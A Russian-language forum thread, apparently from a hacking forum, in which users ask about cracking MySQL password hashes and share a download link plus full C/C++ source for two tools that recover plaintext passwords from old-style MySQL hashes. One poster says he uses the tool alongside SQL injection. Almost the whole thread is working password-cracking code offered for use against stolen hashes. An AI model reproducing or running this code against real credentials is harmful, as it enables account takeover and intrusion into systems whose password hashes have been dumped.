Кто нибудь знает, как можно еще расшифровать hash MuSQL кроме как переберать в PaswordsPro? Какие можно использовать еще утилиты? Вот сдесь http://www.securiteam.com/tools/5YP0H0A40O.html есть утилита под названием - MySQL Brute Force Password Hash Cracker, может кто то её откомпилировать Code: /////////////////////////////////////////////////////////////////////////////////////////////// // // MySQL brute force password attack // // to compile : g++ -omysqlpassword mysqlpassword.c -O6 -lm // // Written by : [email protected], current version http://term.rmci.net/mysqlpassword.cpp // #include <iostream> #include <stdio.h> #include <math.h> #include <stdlib.h> #include <string.h> // memset #include <unistd.h> // usleep using namespace std; struct rand_struct { unsigned long seed1,seed2,max_value; double max_value_dbl; }; void make_scrambled_password(char *,const char *); char *scramble(char *,const char *,const char *, int); int brute(const char *password) { // Tune stuff here, change min / max for the char range to crack and width for max password width. unsigned int min=32,max=122,pos=0,width=11,max_pos=0; unsigned char data[255]; register unsigned long long loops=0; char *encrypted_password = new char[255]; memset(encrypted_password, 0, 255); memset((char*)&data, min, 255); while(width) { loops++; if(data[pos] != max) { data[pos]++; } else { for(register int i=pos; i<max; i++) { if(data[i] != max) { data[i]++; pos=i; break; } } if(pos>max_pos) max_pos=pos; for(register int i=pos-1; i >= 0; i--) { if(i==0 && data[i] == max) { data[i] = min; pos = 0; break; } if(data[i] != max || i==0) { pos = i; break; } data[i] = min; } } if(max_pos>width) { cout<<"No match found"<<endl; width=0; return(0); } data[max_pos+1] = 0; make_scrambled_password(encrypted_password,(const char*)data); if(!strcmp(encrypted_password,password)) { cout<<"MATCH ["<<data<<"] ["<<encrypted_password<<"]==["<<password<<"]"<<endl; return(0); } data[max_pos+1] = min; if((loops%500000)==0) { cout<<"[ "<<dec<<loops<<" ]"; for(int i=0; i<=max_pos; i++) { cout<<" 0x"<<hex<<(int)data[i]; } data[max_pos+1] = 0; cout<<" ("<<data<<")"; data[max_pos+1] = min; cout<<endl; } } } int main(int argc, char* argv[]) { if(argc!=2) { fprintf(stderr,"usage : %s [ENCRYPTED MYSQL PASSWORD]\nexample , 5d2e19393cc5ef67 is encrypted value 'password' : %s 5d2e19393cc5ef67\n",argv[0],argv[0]); return(0); } brute(argv[1]); } /////////////////////////////////////////////////////////////////////////////////////////////////////////// // // thx mysql source ^_^ // void randominit(struct rand_struct *rand_st,ulong seed1, ulong seed2) { rand_st->max_value= 0x3FFFFFFFL; rand_st->max_value_dbl=(double) rand_st->max_value; rand_st->seed1=seed1%rand_st->max_value ; rand_st->seed2=seed2%rand_st->max_value; } static void old_randominit(struct rand_struct *rand_st,ulong seed1) { rand_st->max_value= 0x01FFFFFFL; rand_st->max_value_dbl=(double) rand_st->max_value; seed1%=rand_st->max_value; rand_st->seed1=seed1 ; rand_st->seed2=seed1/2; } double rnd(struct rand_struct *rand_st) { rand_st->seed1=(rand_st->seed1*3+rand_st->seed2) % rand_st->max_value; rand_st->seed2=(rand_st->seed1+rand_st->seed2+33) % rand_st->max_value; return(((double) rand_st->seed1)/rand_st->max_value_dbl); } inline void hash_password(ulong *result, const char *password) { register ulong nr=1345345333L, add=7, nr2=0x12345671L; ulong tmp; for (; *password ; password++) { if (*password == ' ' || *password == '\t') continue; tmp= (ulong) (unsigned char) *password; nr^= (((nr & 63)+add)*tmp)+ (nr << 8); nr2+=(nr2 << 8) ^ nr; add+=tmp; } result[0]=nr & (((ulong) 1L << 31) -1L); /* Don't use sign bit (str2int) */; result[1]=nr2 & (((ulong) 1L << 31) -1L); return; } inline void make_scrambled_password(char *to,const char *password) { ulong hash_res[2]; hash_password(hash_res,password); sprintf(to,"%08lx%08lx",hash_res[0],hash_res[1]); } static inline uint char_val(char X) { return (uint) (X >= '0' && X <= '9' ? X-'0' : X >= 'A' && X <= 'Z' ? X-'A'+10 : X-'a'+10); } char *scramble(char *to,const char *message,const char *password, int old_ver) { struct rand_struct rand_st; ulong hash_pass[2],hash_message[2]; if(password && password[0]) { char *to_start=to; hash_password(hash_pass,password); hash_password(hash_message,message); if (old_ver) old_randominit(&rand_st,hash_pass[0] ^ hash_message[0]); else randominit(&rand_st,hash_pass[0] ^ hash_message[0], hash_pass[1] ^ hash_message[1]); while (*message++) *to++= (char) (floor(rnd(&rand_st)*31)+64); if (!old_ver) { char extra=(char) (floor(rnd(&rand_st)*31)); while(to_start != to) *(to_start++)^=extra; } } *to=0; return to; }
http://www.sendspace.com/file/v4p0z1 Работает быстро. Сам юзаю для секеля.. А вот его сорц... Code: /* MySQL Weak Password Encryption Brute Force * Example: * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast * $ mysqlfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #include <stdio.h> typedef unsigned long u32; /* Allowable characters in password; 33-126 is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2]; u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3]; i = -1; sum = 7; state1_ary[0] = 1345345333L; state2_ary[0] = 0x12345671L; while (1) { while (i < stop) { i++; pass_ary[i] = MIN_CHAR; step_ary[i] = (state1_ary[i] & 0x3f) + sum; xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*MIN_CHAR + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div != 0) continue; d = diff / div; if (d < MIN_CHAR || d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div != 0) continue; e = diff / div; if (e < MIN_CHAR || e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; } while (i >= 0 && pass_ary[i] >= MAX_CHAR) { sum -= MAX_CHAR; i--; } if (i < 0) break; pass_ary[i]++; xor_ary[i] += step_ary[i]; sum++; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } return 0; } void crack(char *hash) { int i, len; u32 targ1, targ2, targ3; int pass[MAX_LEN]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) { printf("Invalid password hash: %s\n", hash); return; } printf("Hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("Trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("Found pass: "); for (i = 0; i < len; i++) putchar(pass[i]); putchar('\n'); break; } } if (len > MAX_LEN) printf("Pass not found\n"); } int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv[i]); return 0; }
